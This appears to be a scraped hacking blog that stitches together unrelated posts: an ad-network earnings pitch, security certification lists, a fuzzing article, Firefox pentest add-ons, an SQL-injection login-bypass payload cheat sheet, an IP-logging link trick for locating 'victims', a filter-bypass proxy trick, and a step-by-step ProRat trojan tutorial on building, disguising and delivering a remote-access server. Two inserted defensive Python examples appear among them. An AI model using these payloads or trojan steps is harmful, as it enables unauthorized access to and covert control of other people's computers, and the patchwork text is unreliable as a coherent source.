
Earn Money Online


I’ve been signed up for Bidvertiser since I started working online but didn’t put much importance on this pay-per-click website. They paid me recently, and this is why I am so excited about this platform. Bidvertiser is just like Google AdSense: you get ads to put on your website, blog, WordPress site, etc., and you get paid when someone clicks on an ad. This is a cool way to earn money online.

It’s easy to sign up for Bidvertiser. They provide a free publisher account. Once you’re approved, you can start putting ads on your page and earn money. To get started, click on the “Add a new bidvertiser” tab and add your website URL. One website can’t be registered in two accounts. You have to choose a category for your website, and this will show ads relevant to that category. Once you’re done, you can click on “template” to choose the ad format, color and style. Click on “Get code” to get your ad code. Here are the reasons why it’s a better alternative to AdSense.

1. They show higher paying ads: This is why the name is “Bidvertiser.” Your ad unit will show the maximum-paid ads each time. This means you will have the chance to earn more money per click.

2. Add as many units as you wish: If you’ve ever used AdSense, then you will know that you can’t put 3 ad units per page. But in Bidvertiser, you can put as many ad units as you want, meaning more revenue. It’s a better choice for longer pages.

3. Minimum payout $50: AdSense pays a minimum of $100 per month, but Bidvertiser will pay you even if you made half of that. Their minimum check amount is $50. Now you may wish to choose Bidvertiser.

4. PayPal payments: PayPal users, it’s good news that Bidvertiser pays you with PayPal, with same-day payment. The minimum payout for PayPal is only $10, isn’t that wonderful?

5. Custom ad units: You can also create a custom ad unit for your website. This is a feature AdSense doesn’t have. You can choose the size (width, height) and even fonts.

6. Current bids: This is some info that AdSense will never share with anyone. You can see the current bid of your ad unit. See the list of ads and bid amounts and you will learn how much you can earn with a particular ad.

7. $20 ad bonus: This is a promotional offer from Bidvertiser. If you sign up as an advertiser in Bidvertiser, you will get $20 ad credit for free. You don’t have to spend anything else until you have used your free credit. This is surely a great way to promote your site.

8. Referral bonus: Bidvertiser offers different advertiser and publisher commissions. All you have to do is add some of the affiliate links and banners to your website. Once a person joins and spends or earns an amount of money, you will be paid a commission.

So what are you waiting for? Register now and earn money online!

EC-Council Security Certifications


The International Council of Electronic Commerce Consultants (EC-Council) is a member-supported professional organization. The EC-Council is headquartered in Albuquerque, New Mexico.
The EC-Council is known primarily as a professional certification body. Its best-known certification is the Certified Ethical Hacker. It also operates a series of IT security conferences and cosponsored SC Magazine's 2007 salary survey, as well as the EC-Council University.
The EC-Council is best known for its professional certifications for the IT security field. It offers numerous certifications in a variety of fields related to IT security, including disaster recovery, secure programming, e-Business and general IT security knowledge.

IT Security Professional Certifications -
  • Certified Ethical Hacker (CEH)
  • Certified EC-Council Instructor (CEI)
  • Computer Hacking Forensic Investigator (CHFI)
  • EC-Council Certified Chief Information Security Officer (CISO)
  • EC-Council Certified Security Analyst (ECSA)
  • EC-Council Certified Incident Handler (ECIH)
  • Certified Network Defense Architect (CNDA)
  • Licensed Penetration Tester (LPT)
  • EC-Council Certified VOIP Professional (ECVP)
  • EC-Council Network Security Administrator (ENSA)
  • EC-Council Certified Computer Investigator (ECCI)
  • EC-Council Certified Encryption Specialist (ECES)
  • EC-Council Certified Chief Information Security Officer C|CISO
Entry Level Security Certifications:
  • Security 5 (Security|5)
  • Network 5 (Network|5)
  • Wireless 5 (Wireless|5)
Graduate Level Certifications:
  • Fundamentals in Computer Forensics
  • Fundamentals in Information Security
  • Fundamentals in Network Security
  • EC-Council Certified Security Specialist (ECSS)

Dark comet RAT TuT [PDf with Picture ] NooB friendly

Manually Web Application Penetration Testing: Fuzzing - Part 4

Introduction
When we test a web application, we do not test a single page, but a lot of pages of a single web application. Each page may have more than one variable, so technically you will be engaging with a ton of variables during your web application test. So when you inject anything into the input, it is good to know what kind of effect your injection has on the server. In this part of this series of articles, we will look at the importance of simple alphabetic injection along with the web page encoding technology and how it affects our testing and result.

Simple Alphabetic Injection
When you engage with many web pages and a ton of variables, it is good to find your input after you inject. When you give something to the web page as an input, your input will not be used in only one place, but it will be used for many variables and tons of places. One of the common ways to check which areas use a given input is to give a simple alphabetic injection. This simple alphabetic injection can be anything. As I said in an earlier article, I personally use Jonnybravo as a username and momma as a password. If I use any special characters within my input, it might get encoded/eliminated to prevent the injection attacks on that page. What encoding is and how it takes place I will cover later on. The reason for using simple alphabetic injection is because it will never be encoded or eliminated by the server and you can easily find your input within the response as well as the request.
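Added example (not from the original article): a small Python helper that applies the marker idea above to a captured response body, listing every place the alphabetic marker is reflected and in which HTML context, since each context needs its own output encoding. The sample page and the function names are constructed for illustration.

```python
import html
import urllib.parse
from html.parser import HTMLParser

VOID_TAGS = {"br", "hr", "img", "input", "link", "meta"}

# Constructed sample response: the marker "Jonnybravo" is echoed in four contexts.
SAMPLE_RESPONSE = """<html><body>
<h1>Welcome Jonnybravo</h1>
<form><input type="text" name="user" value="Jonnybravo"></form>
<script>var currentUser = "Jonnybravo";</script>
<!-- debug: user=Jonnybravo -->
<p>Nothing reflected here</p>
</body></html>"""


class ReflectionFinder(HTMLParser):
    """Records (context, location) for every occurrence of the marker."""

    def __init__(self, marker):
        super().__init__(convert_charrefs=True)
        self.marker = marker
        self.open_tags = []
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and self.marker in value:
                self.hits.append(("attribute", f"{tag}.{name}"))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open_tags:
            while self.open_tags.pop() != tag:
                pass

    def handle_data(self, data):
        if self.marker in data:
            parent = self.open_tags[-1] if self.open_tags else "(root)"
            context = "script" if parent == "script" else "text"
            self.hits.append((context, parent))

    def handle_comment(self, data):
        if self.marker in data:
            self.hits.append(("comment", "<!-- -->"))


def find_reflections(body, marker):
    finder = ReflectionFinder(marker)
    finder.feed(body)
    finder.close()
    return finder.hits


def is_encoding_stable(value):
    """True if HTML-escaping and URL-encoding both leave the value unchanged."""
    return html.escape(value) == value and urllib.parse.quote(value, safe="") == value


if __name__ == "__main__":
    for context, where in find_reflections(SAMPLE_RESPONSE, "Jonnybravo"):
        print(f"{context:10} {where}")
    print(is_encoding_stable("Jonnybravo"), is_encoding_stable("Jonny<bravo>"))
```

`is_encoding_stable` shows why a plain alphabetic marker is used: it comes back byte-for-byte identical whatever encoding the page applies, so a simple substring search finds it.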


Hidden secrets Of windows explorer



Hackers AddOn [FireFox]

Fire Fox - A hackers Browser 


In this brief post, we are listing a few popular and interesting Firefox add-ons that are useful for penetration testers. These add-ons vary from information gathering tools to attacking tools. If you are using BackTrack, then use OWASP Mantra, which has lots of useful add-ons.

(1)Firebug
Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s a really helpful add-on for security testing professionals looking for DOM-based XSS.
Add Firebug to your browser from this link: https://addons.mozilla.org/en-US/firefox/addon/firebug/

(2)Web Developer
Web Developer is another nice add-on that adds various web development tools in the browser. It helps in web application penetration testing.
Add Web Developer to your browser from this link: https://addons.mozilla.org/de/firefox/addon/web-developer/

(3)Live HTTP Headers
Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each HTTP request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think there is any need to explain how important this add-on is for the security testing process.
Add Live HTTP Headers to Firefox with this link: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

(4)Tamper Data
Tamper Data is similar to the Live HTTP Headers add-on but has header editing capabilities. With the Tamper Data add-on, you can view and modify HTTP/HTTPS headers and POST parameters. Thus it helps in security testing web applications by modifying POST parameters. It can be used in performing XSS and SQL injection attacks by modifying header data.
Add the Tamper Data add-on to Firefox with this link: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/


(5)Hackbar
Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits, but you can easily use it to test whether a vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the time, this tool helps in testing XSS vulnerabilities with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.
I am sure most people in the security field already know about this tool. It is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability to send POST form data manually, you can easily bypass client-side validations of the page. If your payload is being encoded at the client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on.
Add the Hackbar add-on to Firefox with this link: https://addons.mozilla.org/en-US/firefox/addon/hackbar/


(6)Websecurify
Websecurify is a nice penetration testing tool that is also available as an add-on for Firefox. We have already covered WebSecurify in detail in a previous article. WebSecurify can detect most common vulnerabilities in web applications. This tool can easily detect XSS, SQL injection and other web application vulnerabilities. Unlike the other listed tools, it is a complete penetration testing tool in itself, available as a browser add-on. It gives most of the features available in the standalone tool.
Add WebSecurify to Firefox with this link: https://addons.mozilla.org/en-us/firefox/addon/websecurify/

(7)XSS Me
Cross-site scripting is the most commonly found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that render a payload on the page and may be vulnerable to an XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not.
Add XSS Me to your Firefox browser: https://addons.mozilla.org/en-us/firefox/addon/xss-me/

(8)SQL Inject Me
SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but displays that it exists. SQL injection is one of the most harmful web application vulnerabilities; it can allow attackers to view, modify, edit, add or delete records in a database. The tool sends escape strings through form fields and searches the responses for database error messages. If it finds a database error message, it marks the page as vulnerable. QA testers can use this tool for SQL injection testing.
Add the SQL Inject Me add-on to your browser: https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

(9)CryptoFox
CryptoFox is an encryption and decryption tool for Mozilla Firefox. It supports most of the available encryption algorithms, so you can easily encrypt or decrypt data with a supported algorithm. This add-on comes with dictionary attack support to crack MD5 passwords. Although it doesn’t have good reviews, it works satisfactorily.
Add the CryptoFox add-on to your browser: https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

cheat sheet for admin page bypass [sql injection]

strings ::

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
= 'or' 1=1
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
or 1=1
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
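
Why strings like these get past a login form, shown from the defender's side as an added example (not code from the original post): a login check that pastes input into the SQL text next to one that binds it as a parameter, run against an in-memory SQLite database. The table layout, function names and the demo password are assumptions made for this example.

```python
import hashlib
import hmac
import sqlite3

# Fixed salt keeps the demo short; a real system stores a random salt per user.
DEMO_SALT = b"constructed-demo-salt"


def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), DEMO_SALT, 50_000).hex()


def make_db():
    """In-memory database holding one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", pw_hash("demo-Passw0rd")))
    return db


def login_vulnerable(db, username, password):
    # The username is pasted into the SQL text, so a quote inside it closes the
    # string literal and whatever follows is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '%s' AND pw_hash = '%s'"
           % (username, pw_hash(password)))
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # the injected text produced invalid SQL for this engine
    return row[0] if row else None


def login_hardened(db, username, password):
    # The value travels as a bound parameter and is never parsed as SQL; the
    # password check happens in code with a constant-time comparison.
    row = db.execute("SELECT username, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return None
    return row[0] if hmac.compare_digest(row[1], pw_hash(password)) else None


def compare(usernames, password="wrong-password"):
    """Map each username input to (vulnerable result, hardened result)."""
    db = make_db()
    return {u: (login_vulnerable(db, u, password), login_hardened(db, u, password))
            for u in usernames}


if __name__ == "__main__":
    # Inputs taken from the list above, submitted with a wrong password.
    for name, result in compare(["admin", "admin' --", "' or 1=1--", "' or '1'='1"]).items():
        print(repr(name), result)
```

Which string succeeds depends on the shape of the concatenated query (here `' or '1'='1` fails only because AND binds tighter than OR), which is why filtering individual strings is not a fix; binding parameters rejects all of them the same way.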

How to hack an IP address of a remote computer


What can you do with an IP address?
Well, you can hack a computer using its IP address.
You can find the location of the computer using its IP address.

Things required:
1)  PHP script to catch the IP.
2) .txt file to store the IP.
you can download them from here.

Procedure:
Step 1: First create an account in any free webhosting site.
          examples are www.110mb.com
                              www.drivehq.com
                              www.t35.com
                              www.my3gb.com
Step 2: Extract the IP finder script you have downloaded.
Step 3: Now Upload the files onto the free web hosting site.
Step 4: Give the link to the ip.php script to your friend.

When he clicks the link, his IP address will be stored in the ip_log.txt file.

DEMONSTRATION:

Here I have uploaded my scripts to www.my3gb.com


and I clicked the ip.php link.
Now my IP address is stored in the ip_log.txt file.

You can check this with www.showmyip.com
Finding the location of the computer:
Now pick the IP address you got from the victim and open www.ip2location.com
Here, enter the IP address in the box and click "find location".
That's it.

HOW TO USE GOOGLE AS A PROXY

Using Google as a proxy is a neat little trick you can use to bypass work or school filters with ease.

Prerequisites

  • none, this shit is easy.



Guide
 




  • translate your language from anything to your language (in my case, English)
  • insert the URL you'd like to visit in the translate box
  • click the "translated" URL on the right
  • you're now using Google as a proxy.
  • to test this, you could translate WHATISMYIP to see if you see Google's IP
  • and, we do:

    GIAC Security Certifications


    Global Information Assurance Certification (GIAC) is an information security certification entity that specialises in technical and practical certification as well as new research in the form of its GIAC Gold program. SANS Institute founded the certification entity in 1999 and the term GIAC is trademarked by The Escal Institute of Advanced Technologies.
    GIAC provides a set of vendor-neutral computer security certifications linked to the training courses provided by the SANS. GIAC is specific to the leading edge technological advancement of IT security in order to keep ahead of "black hat" techniques. Papers written by individuals pursuing GIAC certifications are presented at the SANS Reading Room on GIAC's website.
    Initially all SANS GIAC certifications required a written paper or "practical" on a specific area of the certification in order to achieve the certification. In April 2005, the SANS organization changed the format of the certification by breaking it into two separate levels. The "silver" level certification requires two multiple-choice tests, whereas the "gold" level certification has both the multiple-choice tests requirement as well as a practical.
    As of June 18, 2012, GIAC claims to have granted 42,663 certifications worldwide.

    SANS GIAC Certifications-
    Security Administration
    • GIAC Information Security Fundamentals [GISF]
    • GIAC Security Essentials Certification [GSEC]
    • GIAC Certified Firewall Analyst [GCFW]
    • GIAC Certified Intrusion Analyst [GCIA]
    • GIAC Certified Incident Handler [GCIH]
    • GIAC Certified UNIX Security Administrator [GCUX]
    • GIAC Certified Windows Security Administrator [GCWN]
    • GIAC Certified Enterprise Defender [GCED]
    • GIAC Penetration Tester [GPEN]
    • GIAC Certified Web Application Penetration Tester [GWAPT]
    • GIAC Assessing Wireless Networks [GAWN]
    • GIAC Secure Internet Presence [GSIP]
    Audit
    • GIAC Securing Oracle Certification [GSOC]
    • GIAC Certified ISO-17799 Specialist [G7799]
    • GIAC Systems and Network Auditor [GSNA]
    • GIAC Security Audit Essentials [GSAE]
    Management
    • GIAC Information Security Professional [GISP]
    • GIAC Security Leadership Certification [GSLC]
    • GIAC Certified Project Manager [GCPM]
    • GIAC Certified Security Consultant [GCSC]
    Operations
    • GIAC Operations Essentials Certification [GOEC]
    Software Security and/or Secure Coding
    • GIAC .Net [GNET]    
    • GIAC Secure Software Programmer C [GSSP C]    
    • GIAC Secure Software Programmer Java [GSSP Java]
    • GIAC Secure Software Programmer .NET [GSSP .NET]
    Forensics
    • GIAC Certified Forensic Examiner [GCFE]
    • GIAC Certified Forensic Analyst [GCFA]
    • GIAC Certified Reverse Engineering Malware [GREM]
    Expert
    • GIAC Security Expert [GSE]
    • GIAC Security Expert in Malware [GSE-Malware]
    • GIAC Security Expert in Compliance [GSE-Compliance]

    ProRAT [Trojan ] [TuT]



    Hi guys, today I am going to show you how to set up ProRat and how to hack a computer using it. Well, I am going to finish up the RAT setup articles with this. I will give the countermeasures in my next article. As I haven’t written any articles on direct connection Trojans, I decided to write this one on ProRat.

    Procedure to set up ProRat

    STEP 1. First of all, download ProRat from here. Once it is downloaded, extract it. A password prompt will come up. Enter the password. The password is "pro".

    STEP 2. Open up the program and You should see the following window.



    STEP 3. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


    STEP 4. Next, put in your IP address so the server can connect to you. You need not enter your IP address manually; you can do this by just clicking on the little arrow. It automatically fills in your IP address.
    Next, put in your e-mail so that when and if a victim gets infected it will send you an email.


    STEP 5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Just follow the steps as shown in the figure.


    STEP  6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. You can select an image, text file or pdf file, So as to make the victim trust your file.


    STEP  7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate.    I prefer using .exe files.


    STEP  8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is.


    STEP  9. After this, press Create server; your server will be in the same folder as ProRat. Start giving this file to your victim. When the victim double-clicks the file, his computer will be in your control.


    STEP  10. Now the hacker has lot of options to choose from. He can do many funny things with the victim’s computer.



    NOTE: In this tutorial, I put the victim’s IP as 127.0.0.1 as I am testing it on my computer. In order to hack a remote computer, you need to get the IP address of your victim. If you don't know how to find an IP address, you can read my article on finding out a remote IP address from here

    Contact Us

    24x7 online, we are happy to answer you
    tamilcypc@gmail.com

    Disclaimer

    This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.


